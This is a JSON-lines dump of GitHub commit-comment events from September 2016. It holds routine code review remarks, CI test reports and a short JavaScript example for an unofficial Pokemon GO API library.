{"id":"4611215810","type":"CommitCommentEvent","actor":{"login":"RedSparr0w"},"repo":{"name":"Armax/Pokemon-GO-node-api"},"payload":{"comment":{"id":19153825,"position":null,"line":null,"path":null,"commit_id":"29fbf080b518a43bbe7ef380dc4f84bb3b6e3c3a","created_at":"2016-09-23T22:17:08Z","updated_at":"2016-09-23T22:17:08Z","body":"Not that i can see, you have to [encounter the pokemon first though](https://github.com/Armax/Pokemon-GO-node-api/blob/master/example.js#L114-L119)\r\n\r\nChange [the example.js](https://github.com/Armax/Pokemon-GO-node-api/blob/master/example.js#L114-L119) to this\r\n```javascript\r\nb.EncounterPokemon(currentPokemon, function(suc, dat) {\r\n\tif (suc == \"No result\") return;\r\n\tconsole.log('Encountering pokemon ' + pokedexInfo.name + '...');\r\n\tconsole.log(\"IV: \"+dat.individual_attack+\"|\"+dat.individual_defense+\"|\"+dat.individual_stamina);\r\n\tb.CatchPokemon(currentPokemon, 1, 1.950, 1, 1, function(xsuc, xdat) {\r\n\t\tvar status = ['Unexpected error', 'Successful catch', 'Catch Escape', 'Catch Flee', 'Missed Catch'];\r\n\t\tconsole.log(status[xdat.Status]);\r\n\t});\r\n});\r\n```"}},"created_at":"2016-09-23T22:17:08Z"}
{"id":"4611218372","type":"CommitCommentEvent","actor":{"login":"matsbla"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19153831,"position":20,"line":20,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-23T22:17:47Z","updated_at":"2016-09-23T22:17:47Z","body":"I sized the first down, I think it looks okay now"}},"created_at":"2016-09-23T22:17:47Z"}
{"id":"4611218846","type":"CommitCommentEvent","actor":{"login":"aaylward"},"repo":{"name":"steveash/jopenfst"},"payload":{"comment":{"id":19153833,"position":37,"line":64,"path":"src/main/java/com/github/steveash/jopenfst/utils/FstUtils.java","commit_id":"2ee354788d10cdfc192b7df44051f38775fb0b96","created_at":"2016-09-23T22:17:55Z","updated_at":"2016-09-23T22:17:55Z","body":"just curious -- what's special about 80?"}},"created_at":"2016-09-23T22:17:55Z"}
{"id":"4611219810","type":"CommitCommentEvent","actor":{"login":"dhustkoder"},"repo":{"name":"dhustkoder/OTServ772"},"payload":{"comment":{"id":19153839,"position":null,"line":null,"path":null,"commit_id":"335aab875e7c6c4e01cf6f98e5522d86f4b06bb7","created_at":"2016-09-23T22:18:11Z","updated_at":"2016-09-23T22:18:11Z","body":"@peonso  what's sup, I'm finishing the code there so we can merge"}},"created_at":"2016-09-23T22:18:11Z"}
{"id":"4611222819","type":"CommitCommentEvent","actor":{"login":"dhustkoder"},"repo":{"name":"dhustkoder/OTServ772"},"payload":{"comment":{"id":19153846,"position":null,"line":null,"path":null,"commit_id":"335aab875e7c6c4e01cf6f98e5522d86f4b06bb7","created_at":"2016-09-23T22:18:59Z","updated_at":"2016-09-23T22:18:59Z","body":"@peonso  don't mind these repos are for tests"}},"created_at":"2016-09-23T22:18:59Z"}
{"id":"4611225363","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19153852,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-23T22:19:42Z","updated_at":"2016-09-23T22:19:42Z","body":"> Could be improved by searching for the highest safe location (2x air and 1x block below).\r\n\r\nPlayers could then exploit this to avoid fall damage."}},"created_at":"2016-09-23T22:19:42Z"}
{"id":"4611230803","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19153866,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-23T22:21:08Z","updated_at":"2016-09-23T22:21:08Z","body":"2782485_HybridModel (sanghlee-lbnl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1679 of 2276 tests passed, 0 test warnings)\n\n * 27 tests had: AUD diffs.\n * 27 tests had: EIO diffs.\n * 27 tests had: ESO small diffs.\n * 22 tests had: Table big diffs.\n * 9 tests had: ERR diffs.\n * 1 test had: RDD diffs.\n * 12 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-73.77%25-red.svg)</a> \n"}},"created_at":"2016-09-23T22:21:08Z"}
{"id":"4611231750","type":"CommitCommentEvent","actor":{"login":"justsml"},"repo":{"name":"kofrasa/mingo"},"payload":{"comment":{"id":19153869,"position":6,"line":13,"path":"mingo.js","commit_id":"1f884bb76bc67bdd7fe08b88a80b814e7c36d043","created_at":"2016-09-23T22:21:23Z","updated_at":"2016-09-23T22:21:23Z","body":"Hey @kofrasa - looks pretty good so far... \r\n\r\nMinor note: I think this deserves at least a minor version bump  ;)"}},"created_at":"2016-09-23T22:21:23Z"}
{"id":"4611236124","type":"CommitCommentEvent","actor":{"login":"giuseppe"},"repo":{"name":"aveshagarwal/etcd-container"},"payload":{"comment":{"id":19153876,"position":null,"line":null,"path":null,"commit_id":"e61eb737c769d38a55955aa9c9413b3009100d3f","created_at":"2016-09-23T22:22:34Z","updated_at":"2016-09-23T22:22:34Z","body":"@aveshagarwal great!  I will sync gscrivano/etcd as well.  I had just a small inline comment"}},"created_at":"2016-09-23T22:22:34Z"}
{"id":"4611236309","type":"CommitCommentEvent","actor":{"login":"giuseppe"},"repo":{"name":"aveshagarwal/etcd-container"},"payload":{"comment":{"id":19153877,"position":5,"line":8,"path":"etcd-env.sh","commit_id":"e61eb737c769d38a55955aa9c9413b3009100d3f","created_at":"2016-09-23T22:22:38Z","updated_at":"2016-09-23T22:22:38Z","body":"the destination in the container for the bind mount is always \"/var/lib/etcd\" in the config.json file (line 143).  Should this be made configurable?"}},"created_at":"2016-09-23T22:22:38Z"}
{"id":"4611243122","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"aconanlai/moneyy"},"payload":{"comment":{"id":19153887,"position":null,"line":null,"path":null,"commit_id":"2e31075893b7b68fccc0e59502064906cb1cd051","created_at":"2016-09-23T22:24:28Z","updated_at":"2016-09-23T22:24:28Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [heroku time](https://trello.com/c/c0QLMrML/15-heroku-time)"}},"created_at":"2016-09-23T22:24:28Z"}
{"id":"4611245719","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19153892,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-23T22:25:13Z","updated_at":"2016-09-23T22:25:13Z","body":"2782485_HybridModel (sanghlee-lbnl) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T22:25:13Z"}
{"id":"4611245929","type":"CommitCommentEvent","actor":{"login":"wxy"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19153894,"position":null,"line":null,"path":null,"commit_id":"c171d07f3b187b3bd445fb16c635c505c3c7b7b0","created_at":"2016-09-23T22:25:16Z","updated_at":"2016-09-23T22:25:16Z","body":"哈哈，回复的是乱码。。"}},"created_at":"2016-09-23T22:25:16Z"}
{"id":"4611250256","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19153904,"position":null,"line":null,"path":null,"commit_id":"6bbc3f22ba4cc660cf76279e038fa484e84e51c7","created_at":"2016-09-23T22:26:26Z","updated_at":"2016-09-23T22:26:26Z","body":"Sorry, you're right, I broke the build in how I exported to open source.\r\n\r\nBoth commits are out now, so we should be good."}},"created_at":"2016-09-23T22:26:26Z"}
{"id":"4611252495","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19153912,"position":null,"line":null,"path":null,"commit_id":"5887d12d846210e8c518c8817a8dda6b6db71012","created_at":"2016-09-23T22:27:04Z","updated_at":"2016-09-23T22:27:04Z","body":"\nBuild report #162329278 for sha 5887d12d846210e8c518c8817a8dda6b6db71012:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-13.86%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3685%20/%2010022%20%2836.77%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-34.82%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-23T22:27:04Z"}
{"id":"4611253022","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19153914,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-23T22:27:12Z","updated_at":"2016-09-23T22:27:12Z","body":"https://github.com/PaperMC/Paper/commit/3d2be415ccd2ddef9497321ea3d960868b1030a7"}},"created_at":"2016-09-23T22:27:12Z"}
{"id":"4611254427","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":19153917,"position":null,"line":null,"path":null,"commit_id":"674b917626d98b66e7d1883653d66f7d3993c54d","created_at":"2016-09-23T22:27:35Z","updated_at":"2016-09-23T22:27:35Z","body":"Структура каталогов хорошая. На будущее, в каталоге `classes` у нас по факту хранятся модели, поэтому его лучше назвать `models`."}},"created_at":"2016-09-23T22:27:35Z"}
{"id":"4611256349","type":"CommitCommentEvent","actor":{"login":"gdestuynder"},"repo":{"name":"gdestuynder/rra2json"},"payload":{"comment":{"id":19153921,"position":null,"line":null,"path":null,"commit_id":"3ea3d7d6865e2d7c7fd3d44b40e2b27e8930d910","created_at":"2016-09-23T22:28:08Z","updated_at":"2016-09-23T22:28:08Z","body":"@ameihm0912 ^ this adds a json field hope its ok\r\nits not live yet of course"}},"created_at":"2016-09-23T22:28:08Z"}
{"id":"4611256689","type":"CommitCommentEvent","actor":{"login":"vinyll"},"repo":{"name":"BaseAdresseNationale/ban-monitoring"},"payload":{"comment":{"id":19153922,"position":null,"line":null,"path":null,"commit_id":"e6fac0f6e96d2e9cbcb2ddff2deafda961bb1a48","created_at":"2016-09-23T22:28:13Z","updated_at":"2016-09-23T22:28:13Z","body":"- added helpers to clean strings.\r\n- `Field` class and subclasses should be removed and code using them should use the small functions instead."}},"created_at":"2016-09-23T22:28:13Z"}
{"id":"4611258087","type":"CommitCommentEvent","actor":{"login":"justsml"},"repo":{"name":"kofrasa/mingo"},"payload":{"comment":{"id":19153927,"position":428,"line":305,"path":"mingo.js","commit_id":"1f884bb76bc67bdd7fe08b88a80b814e7c36d043","created_at":"2016-09-23T22:28:36Z","updated_at":"2016-09-23T22:28:36Z","body":"Nice job ES5-ifying things, but still using my functional-style helpers: like ^^ `filter` w/ a `notInArray`\r\n\r\nCompatibility 👍 \r\n\r\n"}},"created_at":"2016-09-23T22:28:36Z"}
{"id":"4611258382","type":"CommitCommentEvent","actor":{"login":"simplon-romainB"},"repo":{"name":"myrNG/Projet_Medias"},"payload":{"comment":{"id":19153928,"position":null,"line":null,"path":null,"commit_id":"4103b5abc83a7793584914134903689789e375ef","created_at":"2016-09-23T22:28:42Z","updated_at":"2016-09-23T22:28:42Z","body":"woah cette organisation je suis admiratif ^^\r\n"}},"created_at":"2016-09-23T22:28:42Z"}
{"id":"4611260908","type":"CommitCommentEvent","actor":{"login":"amilner42"},"repo":{"name":"amilner42/mea2n-kickstarter"},"payload":{"comment":{"id":19153931,"position":166,"line":167,"path":"frontend/src/app/welcome/welcome.component.ts","commit_id":"8b60622b176e6a3c6f757c24683df10e9c601579","created_at":"2016-09-23T22:29:24Z","updated_at":"2016-09-23T22:29:24Z","body":"Done."}},"created_at":"2016-09-23T22:29:24Z"}
{"id":"4611262524","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19153942,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-23T22:29:51Z","updated_at":"2016-09-23T22:29:51Z","body":"Awesome!!!!!"}},"created_at":"2016-09-23T22:29:51Z"}
{"id":"4611262975","type":"CommitCommentEvent","actor":{"login":"christophertull"},"repo":{"name":"California-Data-Collaborative/rate-comparison"},"payload":{"comment":{"id":19153944,"position":null,"line":null,"path":null,"commit_id":"f3727189834a4b9a64d9f7466c704533cf747d7d","created_at":"2016-09-23T22:29:59Z","updated_at":"2016-09-23T22:29:59Z","body":"Seems to work great! The error messages don't appear, but the charts still disappear. @monobina I wonder if it is possible to make the charts stay visible? \r\n\r\nNot a critical request but if there is an easy way then it would be nice. "}},"created_at":"2016-09-23T22:29:59Z"}
{"id":"4611265758","type":"CommitCommentEvent","actor":{"login":"steveash"},"repo":{"name":"steveash/jopenfst"},"payload":{"comment":{"id":19153949,"position":37,"line":64,"path":"src/main/java/com/github/steveash/jopenfst/utils/FstUtils.java","commit_id":"2ee354788d10cdfc192b7df44051f38775fb0b96","created_at":"2016-09-23T22:30:44Z","updated_at":"2016-09-23T22:30:44Z","body":"The non \"null object\" printer is only passed in for unit tests to help print the diffs because i was tired of test failures causing me to have to walk object graphs in the debugger. 80 is just arbitrary for \"to long to fit in one line on the console\".\r\n\r\nIf you are looking jopenfst to use -- drop me an email to talk about it.  As I tried to indicate in the README this is still alpha/beta quality. Some parts are more stable than others."}},"created_at":"2016-09-23T22:30:44Z"}
{"id":"4611266225","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-responsive"},"payload":{"comment":{"id":19153951,"position":15,"line":67,"path":"css/style.css","commit_id":"e8665a4e1256a48d849a3bf14704b036688b5bd7","created_at":"2016-09-23T22:30:52Z","updated_at":"2016-09-23T22:30:52Z","body":"Great stuff!"}},"created_at":"2016-09-23T22:30:52Z"}
{"id":"4611269784","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19153964,"position":22,"line":94,"path":"QuickSubmitPlugin.inc.php","commit_id":"9338ccfd9cda95683ce37d1b9c1e64df9f39d0f5","created_at":"2016-09-23T22:31:52Z","updated_at":"2016-09-23T22:31:52Z","body":"It looks like the form is now handled by an AjaxFormHandler, which means that the Javascript code will expect the server to respond with a formatted JSON message, rather than raw HTML. Are you looking at other plugins for sample code? If not, I can point you to one or two."}},"created_at":"2016-09-23T22:31:52Z"}
{"id":"4611270314","type":"CommitCommentEvent","actor":{"login":"mholt"},"repo":{"name":"epicagency/caddy-expires"},"payload":{"comment":{"id":19153965,"position":80,"line":80,"path":"expires.go","commit_id":"cb2ed464e061263893acfe4cdbcab6f54e244afc","created_at":"2016-09-23T22:32:05Z","updated_at":"2016-09-23T22:32:05Z","body":"Just wondering, could time.ParseDuration make your task here easier and faster? i.e. can you just kind of convert the y/m/d values to `h` values for time.ParseDuration to handle?"}},"created_at":"2016-09-23T22:32:05Z"}
{"id":"4611271794","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-responsive"},"payload":{"comment":{"id":19153969,"position":268,"line":310,"path":"css/style.css","commit_id":"e8665a4e1256a48d849a3bf14704b036688b5bd7","created_at":"2016-09-23T22:32:25Z","updated_at":"2016-09-23T22:32:25Z","body":"Nice work adjusting the font-size in the media query!"}},"created_at":"2016-09-23T22:32:25Z"}
{"id":"4611277291","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19153984,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T22:33:57Z","updated_at":"2016-09-23T22:33:57Z","body":"A Windows exe file installer is in the works?  Also a windows binary zip file too?  Right?"}},"created_at":"2016-09-23T22:33:57Z"}
{"id":"4611280217","type":"CommitCommentEvent","actor":{"login":"myrNG"},"repo":{"name":"myrNG/Projet_Medias"},"payload":{"comment":{"id":19153987,"position":null,"line":null,"path":null,"commit_id":"4103b5abc83a7793584914134903689789e375ef","created_at":"2016-09-23T22:34:48Z","updated_at":"2016-09-23T22:34:48Z","body":"Haha ouais! La puissance de l'indentation! Non mais c'est vrai que j'aime bien quand tout est bien rangé et propre :)!"}},"created_at":"2016-09-23T22:34:48Z"}
{"id":"4611280244","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19153988,"position":null,"line":null,"path":null,"commit_id":"91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150","created_at":"2016-09-23T22:34:48Z","updated_at":"2016-09-23T22:34:48Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2378 tests passed, 25 test warnings)\n\n * 35 tests had: AUD diffs.\n * 6 tests had: EIO diffs.\n * 6 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 10 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.58%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T22:34:48Z"}
{"id":"4611281957","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-responsive"},"payload":{"comment":{"id":19153991,"position":129,"line":171,"path":"css/style.css","commit_id":"e8665a4e1256a48d849a3bf14704b036688b5bd7","created_at":"2016-09-23T22:35:16Z","updated_at":"2016-09-23T22:35:16Z","body":"Great to see you using ems here...this definitely works, but just want you to be aware that often it is common to use % for the width of bigger elements/parts of the layout and em for font-size, margin (particularly left/right), and padding (particularly left/right).  That way, the proportion of that element to the rest of the window remains the same.  % width of an element is based off of the width of its container.  em with of an element is based off of its inherited font-size.  Just something to be aware of so you know your options.  For layout elements, you may find % scales better as you change the window size.  "}},"created_at":"2016-09-23T22:35:16Z"}
{"id":"4611283645","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19153992,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T22:35:44Z","updated_at":"2016-09-23T22:35:44Z","body":"@thinkpad4 https://github.com/streamlink/streamlink/pull/27 for the installer.\r\nI'm not sure about the binary zip file, what is it made of?"}},"created_at":"2016-09-23T22:35:44Z"}
{"id":"4611284699","type":"CommitCommentEvent","actor":{"login":"igniscitrinus"},"repo":{"name":"Metastruct/garrysmod-chatsounds"},"payload":{"comment":{"id":19153997,"position":null,"line":null,"path":null,"commit_id":"092b5c5d7367cfea2c8641c35999b4c7ba4ccf11","created_at":"2016-09-23T22:36:02Z","updated_at":"2016-09-23T22:36:02Z","body":"no"}},"created_at":"2016-09-23T22:36:02Z"}
{"id":"4611286495","type":"CommitCommentEvent","actor":{"login":"zardra"},"repo":{"name":"zardra/nuclide"},"payload":{"comment":{"id":19154003,"position":null,"line":null,"path":null,"commit_id":"3cd390436e5a188e2e19caa9a02baf8716948090","created_at":"2016-09-23T22:36:33Z","updated_at":"2016-09-23T22:36:33Z","body":"The Swift language screenshots did not want to optimize... may have already been done?"}},"created_at":"2016-09-23T22:36:33Z"}
{"id":"4611288320","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154011,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T22:37:05Z","updated_at":"2016-09-23T22:37:05Z","body":"This http://docs.livestreamer.io/install.html#windows-binaries"}},"created_at":"2016-09-23T22:37:05Z"}
{"id":"4611288426","type":"CommitCommentEvent","actor":{"login":"LUModder"},"repo":{"name":"Metastruct/garrysmod-chatsounds"},"payload":{"comment":{"id":19154015,"position":null,"line":null,"path":null,"commit_id":"092b5c5d7367cfea2c8641c35999b4c7ba4ccf11","created_at":"2016-09-23T22:37:07Z","updated_at":"2016-09-23T22:37:07Z","body":"its\r\nthe\r\nnut\r\nshack"}},"created_at":"2016-09-23T22:37:07Z"}
{"id":"4611288813","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154017,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-23T22:37:12Z","updated_at":"2016-09-23T22:37:12Z","body":"Zip archive\r\nThis is minimal zip archive containing a compiled version of Livestreamer that does not require an existing Python installation."}},"created_at":"2016-09-23T22:37:12Z"}
{"id":"4611291545","type":"CommitCommentEvent","actor":{"login":"f3yisayo"},"repo":{"name":"f3yisayo/CSC322-InformationRetrieval"},"payload":{"comment":{"id":19154026,"position":7,"line":19,"path":"CSC322-InformationRetrieval/Form1.cs","commit_id":"8e28ee95d5bcd07adc19c79cef1f6bfbfa7b4aad","created_at":"2016-09-23T22:38:00Z","updated_at":"2016-09-23T22:38:00Z","body":"LOL, I'll fix this path thing in the next commit."}},"created_at":"2016-09-23T22:38:00Z"}
{"id":"4611293463","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154033,"position":null,"line":null,"path":null,"commit_id":"91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150","created_at":"2016-09-23T22:38:31Z","updated_at":"2016-09-23T22:38:31Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T22:38:31Z"}
{"id":"4611296175","type":"CommitCommentEvent","actor":{"login":"tiran"},"repo":{"name":"python/devguide"},"payload":{"comment":{"id":19154040,"position":8,"line":43,"path":"coverity.rst","commit_id":"10317f527701378b68aa248415d33a57e34c7869","created_at":"2016-09-23T22:39:18Z","updated_at":"2016-09-23T22:39:18Z","body":"Coverity has increased the limit to 8 builds a week / 2 builds a day for projects with less than 500k lines of C code. I changed the cronjob to run the builds once a day."}},"created_at":"2016-09-23T22:39:18Z"}
{"id":"4611300613","type":"CommitCommentEvent","actor":{"login":"Techbot121"},"repo":{"name":"Metastruct/garrysmod-chatsounds"},"payload":{"comment":{"id":19154047,"position":null,"line":null,"path":null,"commit_id":"092b5c5d7367cfea2c8641c35999b4c7ba4ccf11","created_at":"2016-09-23T22:40:38Z","updated_at":"2016-09-23T22:40:38Z","body":"http://wow.3kv.in/"}},"created_at":"2016-09-23T22:40:38Z"}
{"id":"4611302936","type":"CommitCommentEvent","actor":{"login":"monobina"},"repo":{"name":"California-Data-Collaborative/rate-comparison"},"payload":{"comment":{"id":19154053,"position":null,"line":null,"path":null,"commit_id":"f3727189834a4b9a64d9f7466c704533cf747d7d","created_at":"2016-09-23T22:41:17Z","updated_at":"2016-09-23T22:41:17Z","body":"@christophertull that's a good point. i am not sure if we can do that. it will be perfect if that can be done or else may be we can insert a message instead that chart is loading..the prior will be better. i'll let you know if i come up with something.."}},"created_at":"2016-09-23T22:41:17Z"}
{"id":"4611307808","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19154063,"position":4,"line":250,"path":"truffle/src/main/ruby/core/file.rb","commit_id":"37852c015c39c1920f7ba57c04f70b3334b67e95","created_at":"2016-09-23T22:42:37Z","updated_at":"2016-09-23T22:42:37Z","body":"I think that's something we'd need to add."}},"created_at":"2016-09-23T22:42:37Z"}
{"id":"4611317732","type":"CommitCommentEvent","actor":{"login":"lfamorim"},"repo":{"name":"bipbop/harlan"},"payload":{"comment":{"id":19154098,"position":null,"line":null,"path":null,"commit_id":"19eebd39babf4c525a16c2313bd06eab0049fb07","created_at":"2016-09-23T22:45:39Z","updated_at":"2016-09-23T22:45:39Z","body":"feature: CCF sum."}},"created_at":"2016-09-23T22:45:39Z"}
{"id":"4611321268","type":"CommitCommentEvent","actor":{"login":"lfamorim"},"repo":{"name":"bipbop/harlan"},"payload":{"comment":{"id":19154107,"position":null,"line":null,"path":null,"commit_id":"19eebd39babf4c525a16c2313bd06eab0049fb07","created_at":"2016-09-23T22:46:42Z","updated_at":"2016-09-23T22:46:42Z","body":"feature: CCF sum."}},"created_at":"2016-09-23T22:46:42Z"}
{"id":"4611331411","type":"CommitCommentEvent","actor":{"login":"Ch3ck"},"repo":{"name":"GDG-Bambili/devfest-mezam"},"payload":{"comment":{"id":19154132,"position":null,"line":null,"path":null,"commit_id":"301bda392f88e8671e3f659d7c0d88716387b439","created_at":"2016-09-23T22:49:42Z","updated_at":"2016-09-23T22:49:42Z","body":"@AchoArnold  @Wisdom-Nji We will be working on this branch for the #DevFest site. Here are some preliminary changes."}},"created_at":"2016-09-23T22:49:42Z"}
{"id":"4611331458","type":"CommitCommentEvent","actor":{"login":"n054"},"repo":{"name":"n054/evernote-cloud-sdk-windows"},"payload":{"comment":{"id":19154133,"position":null,"line":null,"path":null,"commit_id":"35fb554fcc5aa9a505ae58696b00c10162363633","created_at":"2016-09-23T22:49:43Z","updated_at":"2016-09-23T22:49:43Z","body":"$ git push origin"}},"created_at":"2016-09-23T22:49:43Z"}
{"id":"4611331758","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154134,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-23T22:49:49Z","updated_at":"2016-09-23T22:49:49Z","body":"2782485_HybridModel (sanghlee-lbnl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1105 of 1124 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.31%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-25.78%25-green.svg)</a>\n"}},"created_at":"2016-09-23T22:49:49Z"}
{"id":"4611332161","type":"CommitCommentEvent","actor":{"login":"smcpherson"},"repo":{"name":"titlogic/bender"},"payload":{"comment":{"id":19154136,"position":null,"line":null,"path":null,"commit_id":"02b8bddec763a98664607b04d4ff09b2eda0b2be","created_at":"2016-09-23T22:49:55Z","updated_at":"2016-09-23T22:49:55Z","body":"pure gold. 🍔 "}},"created_at":"2016-09-23T22:49:55Z"}
{"id":"4611332381","type":"CommitCommentEvent","actor":{"login":"crheckman"},"repo":{"name":"arpg/HAL"},"payload":{"comment":{"id":19154138,"position":null,"line":null,"path":null,"commit_id":"5204e9d12e8cb710fc4d813811f150f41595b394","created_at":"2016-09-23T22:49:58Z","updated_at":"2016-09-23T22:49:58Z","body":"@fernando10 should we merge this branch?"}},"created_at":"2016-09-23T22:49:58Z"}
